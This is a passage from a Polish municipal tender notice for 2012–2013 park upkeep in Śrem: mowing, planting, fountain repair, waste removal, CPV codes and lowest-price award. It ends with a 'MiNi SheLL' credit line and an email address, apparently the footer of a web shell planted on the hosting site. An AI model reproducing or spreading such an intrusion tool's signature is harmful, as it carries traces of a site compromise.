33)	utrzymanie i konserwacja obiektów znajdujących się na terenie parku 	tj. istniejących budynków, gazonów, rzeźb (odmalowanie w istniejącej 	kolorystyce), pomników (dekorowanie pomników zniczami 
	i wiązankami na imprezy o charakterze miejskim i państwowym, 	umieszczanie stojaków z flagami oraz znicza olejowego - transport 	stojaków i znicza leży po stronie Wykonawcy) oraz tablic 	informacyjnych (zakres prac obejmuje: bieżące utrzymanie 	czystości wokół pomników, rzeźb, tablic, 	usuwanie na bieżąco 	powstających na nich zanieczyszczeń w tym: plam, napisów itp., 	oczyszczanie terenu wokół pomników przed i po 	uroczystościach np. 	usuwanie wypalonych zniczy    i    suchych 	      wiązanek kwiatów,  	pielęgnacja istniejących nasadzeń wokół ww. obiektów;
34)	wymiana tablicy z nazwą parku przy głównym wejściu do parku 	(wykonanie nowej tablicy zgodnie z projektem załączonym do 	przedmiotowego zamówienia), odnowienie krzyża powstańczego 	znajdującego się przy tablicy (oczyszczenie ze starej farby, 	odmalowanie wraz z umocnieniem krzyża u podstawy - prace należy 	wykonać w terminie do 31 sierpnia 2012 r.;
35)	odmalowanie tablic regulaminowych, wymiana folii na tablicy 	Ścieżka dydaktyczna historyczno - przyrodnicza - w razie 	zniszczenia;
36)	oczyszczenie tablic z nazwami alejek; 
37)	wykonanie remontu fontanny parkowej (uszczelnienie i umocnienie 	mis fontanny, uzupełnienie brakującego spoiwa), odmalowanie 
	w istniejącej kolorystyce, zakupienie i zainstalowanie pompy oraz 	dyszy wielostrumieniowej typu wulkan, uruchomienie fontanny na 	sezon od 15 maja do 31 października 2012 r. wraz z bieżącą 	eksploatacją i dozorem nad sprawnością techniczną fontanny, 	utrzymanie w czystości fontanny, wymiana wody, zabezpieczenie 	fontanny na okres zimowy;  
38)	oczyszczanie luster wody z nieczystości przy udziale sprzętu 	pływającego wraz z wywozem tych nieczystości - 2 razy w ciągu roku 
	(dot. Łabędziego Oczka), oraz stała pielęgnacja i utrzymanie porządku 	terenu wokół lustra wody;
39)	obsadzenie gazonów przy głównym wejściu do parku (główna alejka) 	oraz przy Obelisku im. 750 - lecia sadzonkami aksamitki rozpierzchłej 	w ilości 100 szt. wraz z uzupełnieniem ziemi w terminie do 15 maja 	2012 r.  oraz podlewaniem w zależności od potrzeb. Ponadto w razie 	kradzieży sadzonek bądź ich zniszczenia należy uzupełnić brakujące 	nasadzenia (zakup sadzonek należy wkalkulować w cenę oferty);
40)	zgłaszanie Zamawiającemu wszelkich usterek oświetlenia parkowego;
41)	konserwacja 3 szt. masztów polegająca na oczyszczeniu ze starej farby 	i malowaniu, wywieszenie flag z logo gminy Śrem (pranie 
	i prasowanie flag wg potrzeb);
42)	całoroczne oczyszczanie schodów znajdujących się na terenie parku;
43)	pielęgnacja skarpy po amfiteatrze;
44)	utrzymanie i remonty nawierzchni żwirowej w alejkach należy 	uzupełnić żwirem wszelkie doły, koleiny, wyrównać i ubić 	mechanicznie;
45)	koszenie trawników i łąk parkowych w ciągu sezonu wegetacyjnego 	wraz ze zgrabieniem i wywozem pokosu (zgrabione liście i pokos 	należy bezzwłocznie wywieźć z obiektu);
46)	prowadzenie ewidencji zieleni miejskiej oraz ewidencji wyposażenia 	parkowego (ławki, kosze, kwietniki itp.), tj. nanoszenie wszelkich 	zmian i przedstawianie kart ewidencyjnych na żądanie Zamawiającego;
47)	wywóz nieczystości powstałych w trakcie wykonywania prac na 	składowisko odpadów, oraz ewidencjonowanie wywożonych 	nieczystości (w przypadku posiadania decyzji na transport oraz odbiór 	odpadów, bądź zaświadczenia o wpisie do rejestru działalności 	regulowanej);
48)	wyposażenie parku w pojemniki zbiorcze na odpady (zawarcie umowy 	na odbiór odpadów ze specjalistyczną firmą), utwardzenie 
	i ogrodzenie terenu pod pojemniki - lokalizację pojemników 	należy 	uzgodnić z Zamawiającym (w przypadku braku 	dokumentów 	wymienionych w pkt 45). 

Niedopełnienie chociażby jednego z powyższych punktów skutkować będzie potrąceniem 50% wartości ryczałtu miesięcznego.

jak w opisie przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.10.00-3, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pielęgnacja, konserwacja i bieżące utrzymanie zieleni w Parku Śremskich Odlewników o powierzchni 7,2198 ha..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót:
1)	bieżące całoroczne utrzymanie czystości i porządku w ciągach alejek parkowych, w tym alejki żużlowe i alejki wyłożone kostką brukową, poprzez odchwaszczenie na całej powierzchni, zamiatanie, usuwanie zanieczyszczeń i przycinanie brzegów alejek;
2)	okopywanie trawników przy krawężnikach - prace należy wykonać 
w terminie do 30 czerwca 2012 r., a następnie utrzymywanie ich we właściwym stanie;
3)	rozgrabianie kretowisk;
4)	bieżące całoroczne utrzymanie czystości i porządku terenów zielonych (codzienne usuwanie śmieci);
5)	bieżąca całoroczna pielęgnacja trawników poprzez:
	koszenie - w okresie wegetacyjnym wraz z wywiezieniem pokosu każdorazowo po wykonaniu przycięcia trawy (utrzymanie wysokości trawy w granicach do 8 cm);
	nawożenie raz w roku - usługa wraz z kosztem zakupu nawozu, zasilanie wszystkich upraw nawozami mineralnymi wieloskładnikowymi NPK, 2,5 kg nawozu na 100 m2 (zakupiony nawóz należy okazać Zamawiającemu). Termin wykonania do 15 maja 2012 r. (należy powiadomić Zamawiającego pisemnie 
z co najmniej 3 dniowym wyprzedzeniem o terminie wykonywania prac, celem ich kontroli. Prace należy wykonywać w godzinach pracy Urzędu; 
	nawadnianie w okresie suszy - w okresie od maja do września, wodę zapewnia Wykonawca;
dosiewanie traw - usługa wraz z kosztem zakupu siewu trawy 
w okresie od połowy kwietnia do końca sierpnia. Bezpośrednio przed wykonaniem usługi Zamawiający wskaże miejsce;
	przygotowywanie terenu pod sadzenia i siew;
	całoroczne wygrabianie liści - wywiezienie liści każdorazowo po wykonaniu wygrabienia (nie dopuszcza się zalegania pryzm liści przez okres dłuższy niż 1 dzień); 
6)	bieżąca całoroczna pielęgnacja żywopłotów poprzez przycinanie, podlewanie i uzupełnianie w zależności od potrzeb;
7)	całoroczna pielęgnacja rabat kwiatowych i gazonów poprzez ich nawożenie, usuwanie przekwitłych kwiatostanów, uzupełnianie brakujących roślin, odchwaszczanie, dosypywanie kory, zwalczanie szkodników i chorób, utrzymanie gleby w odpowiedniej wilgotności;	
8)	obsadzanie 2 szt. konstrukcji kwietnikowych sadzonkami surfinii 
w ilości  160 szt. oraz 2 szt. gazonów znajdujących się przy głównym wejściu do parku od strony ul. Chłapowskiego sadzonkami aksamitki rozpierzchłej w ilości 50 szt. wraz z uzupełnieniem ziemi w terminie do 15 maja 2012 r., oraz podlewaniem w zależności od potrzeb 
i zasilaniem nawozami minimum raz w tygodniu (odmalowanie gazonów - kolor biały). Ponadto w razie kradzieży sadzonek bądź ich zniszczenia należy uzupełnić brakujące nasadzenia (zakup materiałów do nasadzeń należy wkalkulować w cenę oferty); 
9)	bieżąca całoroczna pielęgnacja róż w głównej alei;
10)	bieżące i całoroczne wykonywanie zabiegów pielęgnacyjnych na drzewach i krzewach, w szczególności wykonywanie cięć sanitarnych, korekcyjnych, prześwietlanie koron drzew, usuwanie połamanych oraz suchych drzew i gałęzi, usuwanie odrostów korzeniowych i pniowych, mechaniczne wzmacnianie drzew-zakładanie wiązań elastycznych 
w koronach drzew, zdejmowanie zawieszonych gałęzi i konarów 
w koronach drzew; 
11)	usuwanie drzew (w ilości do 30 drzew) z frezowaniem pniaków (frezowanie niezwłocznie po wycince), frezowanie pniaków 
z wcześniejszych wycinek, usuwanie samosiewów, pocięcie drzew na klocki i wywóz pociętych na klocki drzew każdorazowo do Ośrodka Pomocy Społecznej w Śremie przy ul. Mickiewicza 40 (Wykonawca zobowiązany jest uzyskać potwierdzenie OPS zestawienia ilości przekazanego drewna z obmiarem Zamawiającego). Koszty ewentualnej wycinki drzew i krzewów w parku ponosić będzie Wykonawca. Wykonawca zobowiązany jest powiadomić każdorazowo Zamawiającego o terminie przeprowadzania wycinki;
12)	zrębowanie gałęzi (obsypywanie rabat i gazonów zrębkami);
13)	uzupełnienie drzewostanu - sadzenie drzew, krzewów, pnączy 
i bylin, 
14)	usuwanie jemioły  z drzew;
15)	palikowanie drzew nowo posadzonych (trzy paliki stabilizowane poprzecznie) i zabezpieczenie siatką PCV lub osłonką;
16)	wykonanie nasadzeń wokół obiektu szaletu miejskiego znajdującego się na obrzeżach parku od strony ul. 1 Maja (3 szt. tuja zachodnia Smaragd wys. od 80 - 100 cm, 6 szt. pęcherznica kalinolistna Diabolo, 6szt. krzewuszka cudowna w odmianie zielonolistnej lub 
z białym obrzeżeniem). Prace należy wykonać w okresie kwiecień - czerwiec 2012, po uprzednim uzgodnieniu z Zamawiającym dokładnego miejsca nasadzeń (zakup roślin należy wkalkulować 
w cenę oferty);
17)	obsadzenie ok. 100 mb skarpy w parku między placem zabaw 
a boiskiem sportowym drzewami w ilości 20 szt. z gatunku kasztanowiec czerwony Briotii lub  klon jawor Leopoldii 
o obwodach nie mniej niż 12 - 14 cm. Przed nasadzeniem należy zaprawić doły urodzajną ziemią, a drzewa należy solidnie zabezpieczyć za pomocą min. 3 palików/drzewko, stabilizowanych drewnianymi poprzeczkami i wiązanych taśmą elastyczną. Misy wokół pni należy wyściółkować korą ogrodniczą (prace należy wykonać w okresie kwiecień - czerwiec 2012; zakup sadzonek należy wkalkulować w cenę oferty);
18)	wykonanie nasadzeń roślin iglastych w sąsiedztwie miejsca do gry 
w boule: dwóch sosen czarnych (Pinus nigra) o wysokości min. 0,5-1,0 m oraz 5 szt. kosodrzewiny (Pinus mugo) lub sosny ościstej (Pinus aristata). Teren pod nasadzenia należy odchwaścić, zabezpieczyć mata ogrodniczą, wyściółkować korą sosnową (prace należy wykonać 
w okresie kwiecień - czerwiec 2012; zakup sadzonek należy wkalkulować w cenę oferty);
19)	tworzenie niecek na powierzchni gleby wokół nowo posadzonych drzew i krzewów;
20)	odśnieżanie, usuwanie gołoledzi i zlodowaceń w ciągach alejek parkowych (w przypadku śliskiej nawierzchni należy posypać piaskiem); 
21)	codzienne opróżnianie koszy parkowych i psich stacji do godz. 1000, 
w okresie od 01 maja do 30 września dwukrotne w ciągu dnia opróżnianie koszy parkowych - ponownie w godzinach popołudniowych do godz. 1700 , wraz z wywozem nieczystości na składowisko (dodatkowo uzupełnianie wg potrzeb woreczków w psich stacjach); 
22)	mycie ławek i koszy na śmieci (1 raz w roku na wiosnę - należy zgłosić Zamawiającemu termin zakończenia prac);
23)	remont i malowanie zniszczonych w okresie trwania umowy ławek, koszy parkowych, psich stacji (1 raz w roku na wiosnę - należy zgłosić Zamawiającemu termin zakończenia prac);
24)	zabezpieczenie i przechowywanie przez okres zimowy koszy 
	na śmieci i przenośnych ławek parkowych;
25)	utrzymanie czystości i porządku na terenie placu zabaw oraz siłowni 	zewnętrznej - konserwacja urządzeń zabawowych i sportowo - 	rekreacyjnych, w tym dbałość o estetykę i stan techniczny urządzeń 	(odmalowanie 1 raz w roku na wiosnę urządzeń zabawowych 
	w istniejącej kolorystyce, farbami impregnacyjno-dekoracyjnymi 	przeznaczonymi do użytku zewnętrznego po uprzednim oczyszczeniu 	ich z pozostałości starej farby), wykonywanie bieżących napraw - 
	z wyłączeniem oświetlenia parkowego, wymiana piasku 
	w 	piaskownicy dwa razy w roku w miesiącach kwiecień i lipiec, 
	a 	później uzupełnianie wg potrzeb (piasek płukany frakcji 0,2 mm 	lub 	żwirek 2 - 8 mm); 
26)	przeniesienie urządzenia zabawowego - zestawu sprawnościowego (wym. podstawy 2,5 x 2,5 m) i zamontowanie go w miejscu wskazanym przez Zamawiającego - w terminie do 15 maja 2012 r.);
27)	ustawienie obrzeża betonowego wokół dwóch placów zabaw (każdy o wymiarach 20 m x 38 m) w parku wraz z nawiezieniem piasku wg poniższych 	parametrów:
	ustawienie obrzeża betonowego 6 x 20 cm na podsypce cementowo - piaskowej wraz z wykonaniem rowku pod obrzeże 20 x 20 cm - 232 mb,
	wykonanie koryta gruntowego pod plac zabaw głębokości 20 cm wraz z profilowaniem i zagęszczeniem podłoża - 1520 m2,
	nawierzchnia placu zabaw z piasku płukanego frakcji 0,2 - 5,0 mm bez cząsteczek i mułów o grubości 20 cm - ok. 550 ton piasku,
	termin wykonania powyższych prac do 31 maja 2012 r.
28)	bieżące całoroczne oczyszczanie z zanieczyszczeń stawku 
	o powierzchni 1500 m2;
29)	bieżące oczyszczanie tablic z regulaminem;
30)	uzupełnienie brakujących obrzeży betonowych w alejkach 	żużlowych, wyrównanie nierówności powierzchni na terenie parku 	poprzez nawiezienie ziemi, nawiezienie i uzupełnienie żużla 
	w alejkach żużlowych (prace należy wykonać w terminie do 31 maja 	2012 r.);
31)	podejmowanie działań w przypadku stwierdzenia aktów wandalizmu 	(np. ustawianie przewróconych koszy parkowych, zbieranie 	porozrzucanych odpadów z koszy, naprawa zniszczonych ławek, 
	koszy parkowych i psich stacji) oraz zgłoszenie tego faktu 	Zamawiającemu i powiadomienie odpowiednich służb - Policji, Straży 	Miejskiej 	(zgłaszanie Zamawiającemu faktu zaginięcia ławek 
	i koszy);
32)	zgłaszanie Zamawiającemu wszelkich usterek oświetlenia parkowego;
33)	prowadzenie ewidencji zieleni miejskiej oraz ewidencji wyposażenia 	parkowego (ławki, kosze, kwietniki itp.), tj. nanoszenie wszelkich 	zmian i przedstawianie kart ewidencyjnych na żądanie 	Zamawiającego;
34)	w związku z corocznie organizowanymi uroczystościami pod 	pomnikiem katyńskim (min. 2 razy 	w roku - w kwietniu i sierpniu) 
	na terenie 	parku należy dokładnie oczyścić pomnik katyński oraz 	uporządkować teren wokół, jak również przystroić pomnik w kwiaty, 	umieścić stojak z flagami oraz znicz olejowy (transport stojaka 
	i znicza leży po stronie Wykonawcy);
35)	wywóz nieczystości powstałych w trakcie wykonywania prac na  	składowisko odpadów, oraz ewidencjonowanie wywożonych 	nieczystości (w przypadku posiadania decyzji na transport oraz odbiór 	odpadów, bądź zaświadczenia o wpisie do rejestru działalności 	regulowanej);
36)	wyposażenie parku w pojemniki zbiorcze na odpady (zawarcie umowy 	na odbiór odpadów ze specjalistyczną firmą), utwardzenie 
	i ogrodzenie terenu pod pojemniki - lokalizację pojemników 	należy 	uzgodnić z Zamawiającym (w przypadku braku 	dokumentów 	wymienionych w pkt 35).

Niedopełnienie chociażby jednego z powyższych punktów skutkować będzie potrąceniem 50% wartości ryczałtu miesięcznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.10.00-3, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com